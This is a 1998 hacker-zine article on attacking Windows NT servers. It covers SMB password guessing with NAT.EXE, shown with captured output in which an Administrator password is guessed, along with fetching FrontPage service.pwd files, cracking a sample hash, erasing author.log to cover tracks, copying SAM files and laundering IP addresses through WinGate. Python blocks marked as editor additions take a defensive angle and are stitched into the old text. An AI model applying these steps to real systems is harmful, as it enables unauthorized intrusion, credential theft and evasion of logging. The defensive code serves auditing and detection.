*SWAT MAGAZINE ISSUE TWELVE: DECEMBER 1998*
**********************************************************************
| .Various notes on Windows NT. |
| By Netw0rk bug |
-----------------------------------------------------------------------
=Contents=
Notes On DLL Files
TCP/UDP Port Numbers
Notes On The Nat Command
RPC - Remote Procedure Calls
The FrontPage Service Password
Notes On Wingate
Recognising NT Servers
NT Accounts And Passwords
The NT Password File
Notes On NETBIOS
=========================================================================
NOTES ON DLL FILES
=========================================================================
Authentication (GINA) module, specifically MSGINA.DLL. Under certain conditions, this file can
be replaced, which is how you would change the SAS key combination.
-------------------------------------------------------------------------
Windows NT 4.0 Service Pack 2 and later includes a password filter DLL file (Passfilt.dll) that lets
you enforce stronger password requirements for users. Passfilt.dll provides enhanced security
against "password guessing" or "dictionary attacks" by outside intruders.
Passfilt.dll implements the following password policy:
- Passwords must be at least six (6) characters long. (The minimum password length can be
  increased further by setting a higher value in the Password Policy for the domain.)
- Passwords must contain characters from at least three (3) of the following four (4) classes:
      Description                                Examples
      English upper case letters                 A, B, C, ... Z
      English lower case letters                 a, b, c, ... z
      Westernized Arabic numerals                0, 1, 2, ... 9
      Non-alphanumeric ("special characters")    such as punctuation symbols
- Passwords may not contain your user name or any part of your full name.
These requirements are hard-coded in the Passfilt.dll file and cannot be changed through the
user interface or registry. If you wish to raise or lower these requirements, you may write your
own .dll and implement it in the same fashion as the Microsoft version that is available with
Windows NT 4.0 Service Pack 2.
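As an added illustration (not code from the article and not Microsoft's Passfilt.dll), the following Python implements the three rules above as a pre-check that a password-change tool or an account audit could run before the DLL ever sees the password. How Passfilt splits the full name into "parts" is not specified on the page; the tokenisation used here (split on spaces, commas, hyphens and underscores, ignore tokens shorter than three characters) is an assumption.

```python
import string

# The four character classes named by the Passfilt.dll policy.
CLASSES = {
    "upper": set(string.ascii_uppercase),
    "lower": set(string.ascii_lowercase),
    "digit": set(string.digits),
    "special": set(string.punctuation),
}
MIN_LENGTH = 6  # Passfilt's hard-coded floor; domain policy may raise it


def name_parts(user_name, full_name):
    """Tokens of the account name and full name that a password may not contain.
    ASSUMPTION: 'any part of your full name' is read as the space/comma/hyphen/
    underscore separated tokens of at least three characters."""
    parts = {user_name.lower()}
    for sep in (",", "-", "_"):
        full_name = full_name.replace(sep, " ")
    parts.update(t.lower() for t in full_name.split() if len(t) >= 3)
    return {p for p in parts if p}


def check_password(password, user_name, full_name="", min_length=MIN_LENGTH):
    """Return a list of policy violations; an empty list means the password passes."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    # Count how many of the four classes contribute at least one character.
    present = [name for name, chars in CLASSES.items()
               if any(c in chars for c in password)]
    if len(present) < 3:
        problems.append(f"only {len(present)} of 4 character classes present "
                        f"({', '.join(present) or 'none'})")
    # Name check is case-insensitive, as a substring match.
    lowered = password.lower()
    for part in sorted(name_parts(user_name, full_name)):
        if part in lowered:
            problems.append(f"contains name part '{part}'")
    return problems


if __name__ == "__main__":
    for pw in ("password", "Tr0ub4dor!", "Alice99!"):
        print(pw, check_password(pw, "alice", "Alice Smith") or "OK")
```

A domain that raises the minimum length in Password Policy is mirrored by passing a larger `min_length`; the class and name rules cannot be relaxed, which is the point the text makes about writing your own filter DLL if you need different rules.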
=========================================================================
TCP/UDP PORT NUMBERS
=========================================================================
Service Port Comments
TCP Ports
echo 7/tcp
discard 9/tcp sink null
systat 11/tcp users
daytime 13/tcp
netstat 15/tcp
qotd 17/tcp quote
chargen 19/tcp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
name 42/tcp nameserver
whois 43/tcp nicname
nameserver 53/tcp domain
apts 57/tcp any private terminal service
apfs 59/tcp any private file service
rje 77/tcp netrjs
finger 79/tcp
http 80/tcp
link 87/tcp ttylink
supdup 95/tcp
newacct 100/tcp [unauthorized use]
hostnames 101/tcp hostname
iso-tsap 102/tcp tsap
x400 103/tcp
x400-snd 104/tcp
csnet-ns 105/tcp CSNET Name Service
pop-2 109/tcp Post Office Protocol version 2
pop-3 110/tcp Post Office Protocol version 3
sunrpc 111/tcp
auth 113/tcp authentication
sftp 115/tcp
uucp-path 117/tcp
nntp 119/tcp usenet readnews untp
ntp 123/tcp network time protocol
statsrv 133/tcp
profile 136/tcp
NeWS 144/tcp news
print-srv 170/tcp
https 443/tcp Secure HTTP
exec 512/tcp remote process execution;
authentication performed using
passwords and UNIX login names
login 513/tcp remote login a la telnet;
automatic authentication performed
based on privileged port numbers
and distributed data bases which
identify "authentication domains"
cmd 514/tcp like exec, but automatic
authentication is performed as for
login server
printer 515/tcp spooler
efs 520/tcp extended file name server
tempo 526/tcp newdate
courier 530/tcp rpc
conference 531/tcp chat
netnews 532/tcp readnews
uucp 540/tcp uucpd
klogin 543/tcp
kshell 544/tcp krcmd
dsf 555/tcp
remotefs 556/tcp rfs server
chshell 562/tcp chcmd
meter 570/tcp demon
pcserver 600/tcp Sun IPC server
nqs 607/tcp nqs
mdqs 666/tcp
rfile 750/tcp
pump 751/tcp
qrh 752/tcp
rrh 753/tcp
tell 754/tcp send
nlogin 758/tcp
con 759/tcp
ns 760/tcp
rxe 761/tcp
quotad 762/tcp
cycleserv 763/tcp
omserv 764/tcp
webster 765/tcp
phonebook 767/tcp phone
vid 769/tcp
rtip 771/tcp
cycleserv2 772/tcp
submit 773/tcp
rpasswd 774/tcp
entomb 775/tcp
wpages 776/tcp
wpgs 780/tcp
mdbs 800/tcp
device 801/tcp
maitrd 997/tcp
busboy 998/tcp
garcon 999/tcp
blackjack 1025/tcp network blackjack
bbn-mmc 1347/tcp multi media conferencing
bbn-mmx 1348/tcp multi media conferencing
orasrv 1525/tcp oracle
ingreslock 1524/tcp
issd 1600/tcp
nkd 1650/tcp
dc 2001/tcp
mailbox 2004/tcp
berknet 2005/tcp
invokator 2006/tcp
dectalk 2007/tcp
conf 2008/tcp
news 2009/tcp
search 2010/tcp
raid-cc 2011/tcp raid
ttyinfo 2012/tcp
raid-am 2013/tcp
troff 2014/tcp
cypress 2015/tcp
cypress-stat 2017/tcp
terminaldb 2018/tcp
whosockami 2019/tcp
servexec 2021/tcp
down 2022/tcp
ellpack 2025/tcp
shadowserver 2027/tcp
submitserver 2028/tcp
device2 2030/tcp
blackboard 2032/tcp
glogger 2033/tcp
scoremgr 2034/tcp
imsldoc 2035/tcp
objectmanager 2038/tcp
lam 2040/tcp
interbase 2041/tcp
isis 2042/tcp
rimsl 2044/tcp
dls 2047/tcp
dls-monitor 2048/tcp
shilp 2049/tcp
NSWS 3049/tcp
rfa 4672/tcp remote file access server
complexmain 5000/tcp
complexlink 5001/tcp
padl2sim 5236/tcp
man 9535/tcp
UDP Ports
echo 7/udp
discard 9/udp sink null
systat 11/udp users
daytime 13/udp
netstat 15/udp
qotd 17/udp quote
chargen 19/udp ttytst source
time 37/udp timserver
rlp 39/udp resource
name 42/udp nameserver
whois 43/udp nicname
nameserver 53/udp domain
bootps 67/udp bootp
bootpc 68/udp
tftp 69/udp
sunrpc 111/udp
erpc 121/udp
ntp 123/udp
statsrv 133/udp
profile 136/udp
snmp 161/udp
snmp-trap 162/udp
at-rtmp 201/udp
at-nbp 202/udp
at-3 203/udp
at-echo 204/udp
at-5 205/udp
at-zis 206/udp
at-7 207/udp
at-8 208/udp
biff 512/udp used by mail system to notify users
of new mail received; currently
receives messages only from
processes on the same machine
who 513/udp maintains data bases showing who's
logged in to machines on a local
net and the load average of the
machine
syslog 514/udp
talk 517/udp like tenex link, but across
machine - unfortunately, doesn't
use link protocol (this is actually
just a rendezvous port from which a
tcp connection is established)
ntalk 518/udp
utime 519/udp unixtime
router 520/udp local routing process (on site);
uses variant of Xerox NS routing
information protocol
timed 525/udp timeserver
netwall 533/udp for emergency broadcasts
new-rwho 550/udp new-who
rmonitor 560/udp rmonitord
monitor 561/udp
meter 571/udp udemon
elcsd 704/udp errlog copy/server daemon
loadav 750/udp
vid 769/udp
cadlock 770/udp
notify 773/udp
acmaint_dbd 774/udp
acmaint_trnsd 775/udp
wpages 776/udp
puparp 998/udp
applix 999/udp Applix ac
puprouter 999/udp
cadlock 1000/udp
hermes 1248/udp
wizard 2001/udp curry
globe 2002/udp
emce 2004/udp CCWS mm conf
oracle 2005/udp
raid-cc 2006/udp raid
raid-am 2007/udp
terminaldb 2008/udp
whosockami 2009/udp
pipe_server 2010/udp
servserv 2011/udp
raid-ac 2012/udp
raid-cd 2013/udp
raid-sf 2014/udp
raid-cs 2015/udp
bootserver 2016/udp
bootclient 2017/udp
rellpack 2018/udp
about 2019/udp
xinupageserver 2020/udp
xinuexpansion1 2021/udp
xinuexpansion2 2022/udp
xinuexpansion3 2023/udp
xinuexpansion4 2024/udp
xribs 2025/udp
scrabble 2026/udp
isis 2042/udp
isis-bcast 2043/udp
rimsl 2044/udp
cdfunc 2045/udp
sdfunc 2046/udp
dls 2047/udp
shilp 2049/udp
rmonitor_secure 5145/udp
xdsxdm 6558/udp
isode-dua 17007/udp
=========================================================================
NOTES ON THE NAT COMMAND
=========================================================================
NAT.EXE [-o filename] [-u userlist] [-p passlist]
Switches:
  -o  Specify the output file. All results from the scan will be written to the
      specified file, in addition to standard output.
  -u  Specify the file to read usernames from. Usernames will be read from the
      specified file when attempting to guess the password on the remote server.
      Usernames should appear one per line in the specified file.
  -p  Specify the file to read passwords from. Passwords will be read from the
      specified file when attempting to guess the password on the remote server.
      Passwords should appear one per line in the specified file.
Addresses should be specified in comma-delimited format, with no spaces. Valid
address specifications include:
  hostname               - "hostname" is added
  127.0.0.1-127.0.0.3    - adds addresses 127.0.0.1 through 127.0.0.3
  127.0.0.1-3            - adds addresses 127.0.0.1 through 127.0.0.3
  127.0.0.1-3,7,10-20    - adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7,
                           and 127.0.0.10 through 127.0.0.20
  hostname,127.0.0.1-3   - adds "hostname" and 127.0.0.1 through 127.0.0.3
All combinations of hostnames and address ranges as specified above are valid.
Here is an actual example of how the NAT.EXE program is used. The information listed here is
an actual capture of the activity. The IP addresses have been changed to protect, well, us.
C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:
[*]--- This machine has a browse list:
Server Comment
--------- -------
STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If
not, keep playing. You will be surprised what you find out.
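The capture above is exactly what an administrator running NAT against their own servers wants turned into a remediation list. The following Python is an added example (not part of the article and not part of NAT) that parses NAT's `[*]---` output lines, collects the credentials that worked and the shares that were readable or writable, and rates the host. The sample lines are taken from the capture above; the severity ranking and the remediation actions are the editor's, drawn from points made elsewhere in this article (Passfilt.dll complexity, blocking ports 137-139 at a firewall, removing the Everyone/Full Control default on shares).

```python
import re
from dataclasses import dataclass, field

# Sample scanner output: lines taken from the NAT capture shown above.
SAMPLE_OUTPUT = [
    "[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'",
    "[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'",
    "[*]--- Obtained server information:",
    "Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]",
    "[*]--- WARNING: Able to access share: \\\\*SMBSERVER\\ADMIN$",
    "[*]--- Checking write access in: \\\\*SMBSERVER\\ADMIN$",
    "[*]--- WARNING: Directory is writeable: \\\\*SMBSERVER\\ADMIN$",
    "[*]--- WARNING: Able to access share: \\\\*SMBSERVER\\C$",
    "[*]--- WARNING: Directory is writeable: \\\\*SMBSERVER\\C$",
    "[*]--- WARNING: Able to access share: \\\\*SMBSERVER\\NETLOGON",
    "[*]--- WARNING: Able to access share: \\\\*SMBSERVER\\Test",
    "[*]--- Attempting to access share: \\\\*SMBSERVER\\D$",
    "[*]--- Unable to access",
]

# Patterns for the NAT message formats visible in the capture.
CRED_RE = re.compile(r"CONNECTED: Username: `([^']*)' Password: `([^']*)'")
SERVER_RE = re.compile(r"Server=\[([^\]]*)\].*Workgroup=\[([^\]]*)\]")
READ_RE = re.compile(r"WARNING: Able to access share: (\S+)")
WRITE_RE = re.compile(r"WARNING: Directory is writeable: (\S+)")

ADMIN_SHARES = {"ADMIN$", "C$"}  # hidden administrative shares seen in the capture


@dataclass
class Findings:
    server: str = ""
    workgroup: str = ""
    credentials: list = field(default_factory=list)  # (username, password) pairs that worked
    readable: set = field(default_factory=set)       # share names NAT could connect to
    writable: set = field(default_factory=set)       # share names NAT could write into

    def severity(self):
        """Rank the host: guessed admin credentials or a writable admin share is the worst case."""
        admin_creds = any(u.upper() == "ADMINISTRATOR" for u, _ in self.credentials)
        if admin_creds or (self.writable & ADMIN_SHARES):
            return "critical"
        if self.writable:
            return "high"
        if self.readable:
            return "medium"
        return "info"


def share_name(unc):
    # e.g. \\*SMBSERVER\ADMIN$ -> ADMIN$
    return unc.rstrip("\\").rsplit("\\", 1)[-1]


def triage(lines):
    """Fold NAT output lines into a Findings record."""
    f = Findings()
    for line in lines:
        if m := CRED_RE.search(line):
            f.credentials.append((m.group(1), m.group(2)))
        elif m := SERVER_RE.search(line):
            f.server, f.workgroup = m.group(1), m.group(2)
        elif m := READ_RE.search(line):
            f.readable.add(share_name(m.group(1)))
        elif m := WRITE_RE.search(line):
            f.writable.add(share_name(m.group(1)))
    return f


def remediation(f):
    """Actions implied by the findings; each maps to a point made in this article."""
    actions = []
    if f.credentials:
        actions.append("change the guessed account passwords and enforce Passfilt.dll complexity")
    if f.readable or f.writable:
        actions.append("remove the Everyone/Full Control default and require a valid user on every share")
    if f.readable or f.credentials:
        actions.append("block TCP/UDP 137-139 at the perimeter so NetBIOS sessions cannot be set up remotely")
    return actions


if __name__ == "__main__":
    found = triage(SAMPLE_OUTPUT)
    print(found.server, found.workgroup, found.severity(), sorted(found.writable))
    for action in remediation(found):
        print(" -", action)
```

Feeding the `-o` output file through `triage` line by line gives one record per host; the `severity` ordering puts a guessed ADMINISTRATOR password or a writable ADMIN$/C$ at the top of the pile, which matches the author's "you are done" verdict above.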
=========================================================================
RPC (REMOTE PROCEDURE CALLS)
=========================================================================
In order for NT to allow various system services to be performed on a remote computer, it
uses RPC, remote procedure calls. Please do not confuse this with SunRPC. You can run
NT RPCs over a NetBIOS/SMB session, or you can piggyback them directly on TCP/IP (or another
transport protocol, perhaps NWLink IPX/SPX). Unfortunately we don't have any good
documentation on what inherent services NT provides through native RPC. Complex server-type
programs (like Exchange) provide their own RPC services in addition to the ones NT provides as
an operating system. (TCP port 135 is used as a port-mapper port; we also know that if too
much information is fed through port 135, you can crash an NT box.) Some client software must
access TCP port 135 before accessing the RPC service itself (hint, hint). Keep in mind that TCP
port 135 can be blocked. Bummer, eh?
=========================================================================
THE FRONTPAGE SERVICE PASSWORD
=========================================================================
The haccess.ctl file is sometimes called a shadow password file; well, this is not exactly correct.
The file can give you a lot of information, including the location of the service password file. A
complete example of the haccess.ctl file is given below:
The #haccess.ctl file:
# -FrontPage-
Options None
order deny,allow
deny from all
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
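To show what the access file gives away, here is an added Python example (not from the article and not from FrontPage) that parses #haccess.ctl directives and checks whether the AuthUserFile and AuthGroupFile paths fall inside the web content root, that is, whether the credential files sit where a plain GET could fetch them. The directive lines are the ones listed above; the document-root values passed in are assumptions made for the example.

```python
import posixpath

# The #haccess.ctl listing from above, embedded as sample input.
SAMPLE_HACCESS = """\
# -FrontPage-
Options None
order deny,allow
deny from all
AuthName default_realm
AuthUserFile c:/frontpage\\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\\ webs/content/_vti_pvt/service.grp
"""

CREDENTIAL_DIRECTIVES = ("authuserfile", "authgroupfile")


def parse_haccess(text):
    """Parse 'Directive value' lines into a dict keyed by lower-cased directive name.
    Comment lines start with '#'. Backslash-escaped spaces in values (as in the
    'frontpage\\ webs' path above) are unescaped."""
    directives = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, value = line.partition(" ")
        directives[name.lower()] = value.strip().replace("\\ ", " ")
    return directives


def _norm(path):
    """Normalise a Windows or POSIX path for a case-insensitive prefix comparison."""
    return posixpath.normpath(path.replace("\\", "/")).lower().rstrip("/")


def files_under_docroot(directives, docroot):
    """Return {directive: url_path} for credential files that resolve inside docroot.
    A file inside the content root is reachable by URL unless the server blocks it."""
    root = _norm(docroot)
    exposed = {}
    for key in CREDENTIAL_DIRECTIVES:
        path = directives.get(key)
        if not path:
            continue
        p = _norm(path)
        if p == root or p.startswith(root + "/"):
            exposed[key] = "/" + p[len(root):].lstrip("/")
    return exposed


if __name__ == "__main__":
    d = parse_haccess(SAMPLE_HACCESS)
    # ASSUMPTION: the FrontPage content root for this example.
    print(files_under_docroot(d, "C:\\FrontPage Webs\\Content"))
```

Run against the sample, both files resolve to `/_vti_pvt/...` under the content root, which is why the page later lists `GET /_vti_pvt/service.pwd` as something to look for; the fix is to keep the password files outside the content directory or make sure the server really enforces the `deny from all` on that path.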
Executing fpservwin.exe allows FrontPage server extensions to be installed on:
  port 443 (HTTPS) Secure Sockets Layer
  port 80  (HTTP)
NOTE: The Limit line. Telnetting to port 80 or 443 and using GET, POST, and PUT can be used
instead of FrontPage.
The following is a list of the Internet Information Server file locations
in relation to the local hard drive (C:) and the web (www.target.com):
  C:\InetPub\wwwroot
  C:\InetPub\scripts                          /Scripts
  C:\InetPub\wwwroot\_vti_bin                 /_vti_bin
  C:\InetPub\wwwroot\_vti_bin\_vti_adm        /_vti_bin/_vti_adm
  C:\InetPub\wwwroot\_vti_bin\_vti_aut        /_vti_bin/_vti_aut
  C:\InetPub\cgi-bin                          /cgi-bin
  C:\InetPub\wwwroot\srchadm                  /srchadm
  C:\WINNT\System32\inetserv\iisadmin         /iisadmin
  C:\InetPub\wwwroot\_vti_pvt
FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For
each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the
FrontPage web that the access file points to:
service.pwd contains the list of users and passwords for the FrontPage web.
service.grp contains the list of groups (one group for authors and one for administrators in
FrontPage).
On Netscape servers, there are no service.grp files. The Netscape password files are:
administrators.pwd for administrators
authors.pwd for authors and administrators
users.pwd for users, authors, and administrators
  C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM           Index Server sample page
If Index Server is running under Internet Information Server, service.pwd (or any other file)
can sometimes be retrieved. Search for:
  "#filename=*.pwd"
  C:\Program Files\Microsoft FrontPage\_vti_bin
  C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
  C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
  C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm   /iisadmin/isadmin
  C:\InetPub\ftproot                                       The default location for FTP
The ftp service by default runs on the standard port 21.
Check to see if anonymous connections are allowed. By default, Internet Information Server
creates and uses the account IUSR_computername for all anonymous logons. Note that the
password is used only within Windows NT ; anonymous users do not log on using this user name
and password.
Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail
address as the password. The FTP service then uses the IUSR_computername account as the
logon account for permissions. When installed, Internet Information Server's Setup created the
account IUSR_computername in the Windows NT User Manager for Domains and in Internet
Service Manager. This account was assigned a random password for both in Internet Service
Manager and in the Windows NT User Manager for Domains. If you change the password, you must
change it in both places and make sure it matches.
NOTE: Name and password are case sensitive
Scanning PORT 80 (http) or 443 (https) options:
  GET /_vti_inf.html                  # Ensures that FrontPage server extensions are installed.
  GET /_vti_pvt/service.pwd           # Contains the encrypted password file. Not used on IIS
                                      # and WebSite servers.
  GET /_vti_pvt/authors.pwd           # On Netscape servers only. Encrypted names and
                                      # passwords of authors.
  GET /_vti_pvt/administrators.pwd
  GET /_vti_log/author.log            # If author.log is there it will need to be cleaned to
                                      # cover your tracks.
  GET /samples/search/queryhit.htm
If service.pwd is obtained it will look similar to this:
Vacuum:SGXJVl6OJ9zkE
The above password is apple
Turn it into Unix passwd-file format (the hash is standard DES crypt(3)):
Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash
Other ways of obtaining service.pwd
http://ftpsearch.com/index.html
search for service.pwd
http://www.altavista.digital.com
advanced search for link:"/_vti_pvt/service.pwd"
=========================================================================
NOTES ON WINGATE
=========================================================================
When you do a regular install of WinGate without changing anything, there are a few defaults:
  Port   Service
  23     Telnet Proxy Server - this is the default and is running right after install.
  1080   SOCKS Server - once set up via GateKeeper, this has no password until you set one.
  6667   IRC Mapping - once set up via GateKeeper, this has no password until you set one.
The biggest threat to your server is the port 23 telnet proxy.
Port 1080 SOCKS Proxy
The SOCKS proxy is not installed by default, but as soon as you use GateKeeper to install it, it
runs with no password unless you set one. If you are familiar with SOCKS you know that there
are many things you could do with it.
Port 6667 IRC Proxy
The IRC proxy works like a WinGate telnet proxy bounce to an IRC server, except that the IRC
proxy is already set to go to a particular server. It is not set to run after install, but once you do
install it, it is set up with no password unless you set one.
Mr. Rodd.
He had discovered this bug, had written an exploit for it, and had written a netscanner which
would comb a specified netblock looking for vulnerable WinGate hosts. He managed to find that if
one telnets to a WinGate host that is not properly secured (which was, until a week or so ago, the
default state of these servers), one could telnet into and then back out of the WinGate server,
which would "launder" one's actual IP address. Thereafter, if one mounted an attack on another
machine, or if one sent e-mail by "hijacking" an open SMTP server, one would seem to be coming
from the location of the WinGate server. This exploit was used to harass anti-spammers with
untraceable e-mail, but one could well imagine that it could be used for a variety of other attacks.
=========================================================================
RECOGNISING NT SERVERS
=========================================================================
[11.2.1] How can I tell if it's an NT box?
Hopefully it is a web server, and they've simply stated proudly "we're running NT", but don't
expect that...
Port scanning will find some. Typically you'll see port 135 open. This is no guarantee it's not
Windows 95, however. Using Samba you should be able to connect and query for the existence
of HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT and then check
\CurrentVersion\CurrentVersion to determine the version running. If guest is enabled, try this first
as Everyone has read permissions here by default.
Port 137 is used for running NetBios over IP, and since in the Windows world NetBios is used,
certainly you can expect port 137 to be open if IP is anywhere in use around NT.
Another possible indication is checking for port 139. This tells you your target is advertising an
SMB resource to share info, but it could be any number of things, such as a Windows 95 machine
or even Windows for Workgroups. These may not be entirely out of the question as potential
targets, but if you are after NT you will have to use a combination of the aforementioned
techniques coupled with some common sense.
To simplify this entire process, Secure Networks Inc. has a freeware utility called NetBios
Auditing Tool. This tool's intent is to test NetBios file sharing configurations and passwords on
remote systems.
=========================================================================
NT ACCOUNTS AND PASSWORDS
=========================================================================
There are two accounts that come with NT out of the box – administrator and guest. In a network
environment, I have run into local administrator access unpassworded, since the Sys Admin
thought that global accounts ruled over local ones. Therefore it is possible to gain initial access to
an NT box by using its local administrator account with no password.
Guest is another common unpassworded account, although recent shipments of NT disable the
account by default. While it is possible that some companies will delete the guest account, some
applications require it. If Microsoft Internet Studio needs to access data on another system, it
will use guest for that remote access.
You will find that by default all accounts in NT have complete SMB functionality. This includes
the Guest account. (In WinNT 3.51 the guest account is auto-created and active; in WinNT 4.0 it
is auto-created but not active.) Now, two things to remember: when it comes to login attempt
failures, the administrator account is NEVER locked out after a certain number of login
attempts (this rule ALWAYS applies), and by default, when Windows NT is installed, NONE of the
accounts have failed-login-attempt lockout. Also, in order for SMB to work, UDP/TCP ports
137, 138 and 139 (NetBIOS over TCP) must be open.
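Because the built-in Administrator account cannot be locked out, the only control left against password guessing on it is noticing the guesses. The following Python is an added example (not from the article) of a sliding-window detector run over a handful of constructed failed-logon records; the record format is invented for the example and is not NT's event log format, so a real deployment would swap in the parser for whatever log source it has.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# CONSTRUCTED sample records (not from the page); the format is an assumption.
SAMPLE_LOG = """\
1998-12-01T07:44:30 STUDENT1 LOGON_FAILURE user=ADMINISTRATOR from=192.0.2.10
1998-12-01T07:44:31 STUDENT1 LOGON_FAILURE user=ADMINISTRATOR from=192.0.2.10
1998-12-01T07:44:31 STUDENT1 LOGON_FAILURE user=ADMINISTRATOR from=192.0.2.10
1998-12-01T07:44:32 STUDENT1 LOGON_FAILURE user=ADMINISTRATOR from=192.0.2.10
1998-12-01T07:44:33 STUDENT1 LOGON_FAILURE user=ADMINISTRATOR from=192.0.2.10
1998-12-01T07:44:34 STUDENT1 LOGON_SUCCESS user=ADMINISTRATOR from=192.0.2.10
1998-12-01T07:50:00 STUDENT1 LOGON_FAILURE user=jsmith from=192.0.2.44
1998-12-01T08:20:00 STUDENT1 LOGON_FAILURE user=jsmith from=192.0.2.44
"""

LINE_RE = re.compile(
    r"^(\S+) (\S+) (LOGON_FAILURE|LOGON_SUCCESS) user=(\S+) from=(\S+)$")

# Per the text: the built-in Administrator is never locked out, whatever the policy says.
NEVER_LOCKED_OUT = {"ADMINISTRATOR"}


def parse(text):
    """Yield (timestamp, host, kind, USER, source) tuples, skipping unparseable lines."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, host, kind, user, src = m.groups()
            yield datetime.fromisoformat(ts), host, kind, user.upper(), src


def detect_guessing(text, threshold=5, window=timedelta(minutes=1)):
    """Flag (user, source) pairs with >= threshold failures inside `window`, and
    separately flag a success that follows such a burst."""
    recent = defaultdict(deque)  # (user, source) -> timestamps of recent failures
    flagged = set()
    alerts = []
    for ts, host, kind, user, src in parse(text):
        key = (user, src)
        if kind == "LOGON_FAILURE":
            q = recent[key]
            q.append(ts)
            while q and ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                note = ("account exempt from lockout; alerting is the only control"
                        if user in NEVER_LOCKED_OUT else "lockout policy may apply")
                alerts.append({"kind": "guessing", "host": host, "user": user,
                               "source": src, "failures": len(q), "note": note})
        elif kind == "LOGON_SUCCESS" and key in flagged:
            alerts.append({"kind": "success-after-guessing", "host": host,
                           "user": user, "source": src})
    return alerts


if __name__ == "__main__":
    for a in detect_guessing(SAMPLE_LOG):
        print(a)
```

In the sample the Administrator burst trips the threshold on the fifth failure and the success a second later is raised as its own alert, while jsmith's two failures half an hour apart never accumulate inside the one-minute window. The note field carries the page's point: for Administrator there is no lockout to lean on, so the alert is the response.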
=========================================================================
THE NT PASSWORD FILE
=========================================================================
Accessing the password file in NT
The location of what you need is \\WINNT\SYSTEM32\CONFIG\SAM, which is the security database.
This is usually world readable by default, but locked since it is in use by system components.
It is possible that there are SAM.SAV files which could be readable. If so, these could be
obtained for the purpose of getting password info.
During the installation of NT a copy of the password database is put in \\WINNT\REPAIR. Since it
was just installed, only the Administrator and Guest accounts will be there, but maybe
Administrator is enough -- especially if the Administrator password is not changed after
installation.
=========================================================================
NOTES ON NETBIOS
=========================================================================
NetBIOS over TCP/IP should normally be disabled for a firewall or web server. The following is a
list of the ports used by NBT.
- NetBIOS-ns  137/tcp  NETBIOS Name Service
- NetBIOS-ns  137/udp  NETBIOS Name Service
- NetBIOS-dgm 138/tcp  NETBIOS Datagram Service
- NetBIOS-dgm 138/udp  NETBIOS Datagram Service
- NetBIOS-ssn 139/tcp  NETBIOS Session Service
- NetBIOS-ssn 139/udp  NETBIOS Session Service
What exactly does the NetBios Auditing Tool do?
